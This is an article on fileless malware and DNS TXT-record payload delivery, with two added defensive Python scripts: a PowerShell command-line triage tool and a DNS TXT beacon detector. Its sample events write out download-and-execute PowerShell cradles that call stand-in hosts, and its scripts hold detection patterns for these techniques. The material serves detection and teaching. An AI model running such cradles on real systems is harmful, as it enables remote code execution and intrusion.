July 10, 2019
Fileless malware is not entirely new, but it has seen a resurgence, with more advanced techniques. One common technique is to abuse tools that already exist on the victim system, so that no malicious executable is ever written to disk.
With this technique, a malicious actor can operate for a long time undetected. The OceanLotus group carried out Operation Cobalt Kitty for up to a year without detection by abusing built-in system tools. Another notable example is Astaroth, a fileless trojan that has been abusing a legitimate Avast antivirus process to load and run its malicious code, without necessarily performing any DLL hijacking.
System tools are not the only option. In 2017, the DNSMessenger malware used DNS queries to deliver its payload via TXT records. A TXT record lets a DNS zone attach arbitrary text to a name, so any host that is allowed to resolve names can fetch attacker-supplied script fragments over a channel that is rarely inspected. The retrieved commands were then executed with PowerShell. Bypassing the PowerShell execution policy is trivial, even for a script kiddie: it is not a security boundary, and a single command-line switch disables it. This lets an attacker download further payloads and either execute them in memory or inject malicious code into legitimate processes.
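The PowerShell tradecraft described above (execution policy bypass, hidden window, download cradle, commands pulled from DNS TXT records) leaves a recognisable fingerprint in process-creation logs. The script below is an added example, not code from the original article or from any of the malware it names: it scores constructed command lines of the kind a Sysmon Event ID 1 or Security 4688 record would carry, and decodes `-EncodedCommand` payloads, which PowerShell expects as base64 of UTF-16LE text. The event format, host names, the `192.0.2.10` and `cmd.example.net` addresses, and the indicator threshold are all assumptions made for the illustration.

```python
"""Triage PowerShell command lines for fileless-malware tradecraft.

Added example: scans constructed process-creation records (the shape of a Sysmon
Event ID 1 or Security 4688 event), decodes -EncodedCommand payloads (base64 of
UTF-16LE text) and scores the indicators found. Thresholds and sample data are
assumptions for illustration, not taken from any real incident.
"""
import base64
import re
from typing import Optional

# Launch switches that, in combination, are typical of a hidden, policy-bypassing loader.
FLAG_PATTERNS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "no_profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
    "non_interactive": re.compile(r"-(?:noni|noninteractive)\b", re.I),
}
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_PATTERN = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Patterns searched in the script body (command line plus any decoded payload).
BODY_PATTERNS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "dns_txt_lookup": re.compile(r"Resolve-DnsName[^|]*-Type\s+TXT|nslookup[^|]*-(?:q|type)=txt", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
}
SUSPICIOUS_THRESHOLD = 2  # assumption: two or more indicators is worth an analyst's time


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Reverse encode_command; None if the blob is not valid base64 or not UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Return the indicators found in one command line, decoding -EncodedCommand first."""
    indicators = [name for name, pat in FLAG_PATTERNS.items() if pat.search(cmdline)]
    decoded = None
    body = cmdline
    match = ENCODED_PATTERN.search(cmdline)
    if match:
        indicators.append("encoded_command")
        decoded = decode_command(match.group(1))
        if decoded is not None:
            body = cmdline + "\n" + decoded  # scan the decoded script as well
    indicators += [name for name, pat in BODY_PATTERNS.items() if pat.search(body)]
    return {"indicators": indicators, "decoded": decoded, "score": len(indicators)}


def triage(events: list) -> list:
    """Return the events that meet the threshold, highest score first."""
    hits = []
    for event in events:
        result = analyze_command_line(event["command_line"])
        if result["score"] >= SUSPICIOUS_THRESHOLD:
            hits.append({"host": event["host"], "user": event["user"], **result})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


# Constructed sample events (not real logs). The third one carries a payload that pulls its
# commands out of DNS TXT records, as DNSMessenger did, encoded here by encode_command().
DNS_STAGER = "$t=(Resolve-DnsName -Name cmd.example.net -Type TXT).Strings -join '';IEX $t"
SAMPLE_EVENTS = [
    {"host": "WS-01", "user": "CORP\\backup",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "WS-02", "user": "CORP\\jdoe",
     "command_line": "powershell.exe -nop -w hidden -ep bypass -c "
                     "\"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""},
    {"host": "WS-03", "user": "CORP\\asmith",
     "command_line": "powershell.exe -NonI -W Hidden -Enc " + encode_command(DNS_STAGER)},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']} score={hit['score']} {hit['indicators']}")
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The benign backup job on WS-01 scores one indicator (`-NoProfile`) and stays below the threshold; the two loaders score five each. Decoding the encoded command matters because the strings an analyst would otherwise grep for (`IEX`, `Resolve-DnsName`) never appear in the raw command line of WS-03.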
Conventional antivirus tools use combinations of the following methods to detect malware:
- Signature detection
- Behavioral analysis
- Sandbox analysis
With no file saved to disk, conventional antivirus tools have little to work with: signature matching and sandbox detonation both need a file to inspect, and behavioral analysis only helps if it watches script and in-memory activity rather than just file writes. Once running, the malware can perform a wide variety of tasks on a system:
- Logging keystrokes
- Stealing user credentials
- Taking screenshots
- Privilege escalation
- Lateral movement within a network.
Mitigating Fileless attacks
- Educating staff - This is probably the best place to start, since fileless malware still needs an initial foothold, usually through social engineering (a malicious document or link) or exploitation of an unpatched vulnerability.
- Monitoring network traffic - Traffic to unknown or untrusted domains, including unusual DNS query patterns, can be an indicator of compromise.
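The network-monitoring advice above and the DNSMessenger case earlier on this page point at the same detection: a host using DNS TXT records as a command channel polls one domain on a steady cadence, uses a fresh subdomain on every query so the answer is never cached, and receives answers far larger than an SPF or DMARC record. The script below is an added example, not code from the original article or from any tool it mentions: it builds that profile per client and domain from constructed resolver log lines and flags the outlier while leaving a mail server and a monitoring host alone. The log format, the addresses, the `cmd.example.net` domain and the thresholds are assumptions for the illustration.

```python
"""Spot DNS TXT-record command channels in resolver logs.

Added example: groups TXT queries per (client, registrable domain) and flags clients that
poll one domain on a regular cadence, with a fresh subdomain per query (cache busting)
and oversized answers. Log format, thresholds and sample data are assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed resolver log (not real traffic): "epoch client qtype qname answer_bytes".
# 10.0.0.25 is a mail server doing SPF/DMARC/DKIM lookups, 10.0.0.30 a monitor that
# re-checks one SPF record every five minutes, 10.0.0.77 a host polling a TXT channel.
SAMPLE_DNS_LOG = """\
# epoch      client    qtype qname                              answer_bytes
1562745600 10.0.0.25 TXT example.com 62
1562745603 10.0.0.25 TXT _dmarc.example.com 71
1562745605 10.0.0.25 TXT selector1._domainkey.example.org 412
1562745600 10.0.0.30 TXT example.com 62
1562745900 10.0.0.30 TXT example.com 62
1562746200 10.0.0.30 TXT example.com 62
1562746500 10.0.0.30 TXT example.com 62
1562746800 10.0.0.30 TXT example.com 62
1562747100 10.0.0.30 TXT example.com 62
1562745590 10.0.0.77 A www.example.com 16
1562745600 10.0.0.77 TXT 9c1e.cmd.example.net 248
1562745661 10.0.0.77 TXT 3bd0.cmd.example.net 251
1562745719 10.0.0.77 TXT 77a2.cmd.example.net 247
1562745780 10.0.0.77 TXT e04f.cmd.example.net 250
1562745842 10.0.0.77 TXT 5b19.cmd.example.net 249
1562745899 10.0.0.77 TXT c8d3.cmd.example.net 252
1562745960 10.0.0.77 TXT 12fe.cmd.example.net 246
1562746021 10.0.0.77 TXT ab40.cmd.example.net 250
"""


def base_domain(qname: str) -> str:
    """Crude registrable-domain guess: the last two labels. A real deployment should use
    the Public Suffix List so that names under e.g. co.uk group correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text: str) -> list:
    """Parse the assumed whitespace-separated log format into dicts, skipping comments."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, client, qtype, qname, answer = line.split()
        records.append({"ts": int(ts), "client": client, "qtype": qtype.upper(),
                        "qname": qname, "answer_bytes": int(answer)})
    return records


def txt_profile(records: list) -> dict:
    """Per (client, base domain): query count, distinct names, answer size, cadence jitter."""
    groups = defaultdict(list)
    for r in records:
        if r["qtype"] == "TXT":
            groups[(r["client"], base_domain(r["qname"]))].append(r)
    profiles = {}
    for key, rs in groups.items():
        rs.sort(key=lambda r: r["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(rs, rs[1:])]
        profiles[key] = {
            "queries": len(rs),
            "unique_names": len({r["qname"] for r in rs}),
            "mean_answer_bytes": mean([r["answer_bytes"] for r in rs]),
            "gap_stdev": pstdev(gaps) if gaps else None,  # low jitter means a timer, not a human
        }
    return profiles


def find_txt_beacons(records: list, min_queries: int = 5, min_unique_ratio: float = 0.8,
                     min_answer_bytes: int = 200, max_gap_stdev: float = 15.0) -> list:
    """Flag (client, domain) pairs whose TXT traffic looks like a polled command channel.
    All thresholds are assumptions and need tuning against the local baseline."""
    hits = []
    for (client, domain), p in txt_profile(records).items():
        unique_ratio = p["unique_names"] / p["queries"]
        if (p["queries"] >= min_queries
                and unique_ratio >= min_unique_ratio
                and p["mean_answer_bytes"] >= min_answer_bytes
                and p["gap_stdev"] is not None and p["gap_stdev"] <= max_gap_stdev):
            hits.append({"client": client, "domain": domain, **p})
    return hits


if __name__ == "__main__":
    for hit in find_txt_beacons(parse_log(SAMPLE_DNS_LOG)):
        print(f"{hit['client']} -> {hit['domain']}: {hit['queries']} TXT queries, "
              f"{hit['unique_names']} unique names, ~{hit['mean_answer_bytes']:.0f} B answers, "
              f"gap stdev {hit['gap_stdev']:.1f}s")
```

Only 10.0.0.77 is reported. The mail server touches several domains once each, and the monitoring host asks the same name six times on a perfect timer, so the unique-name ratio keeps it out; that ratio is the check that separates cache-busting polling from ordinary repeated lookups. TXT answers can legitimately be large (DKIM keys, as the 412-byte example shows), so answer size alone is a poor signal and is only used together with the other three.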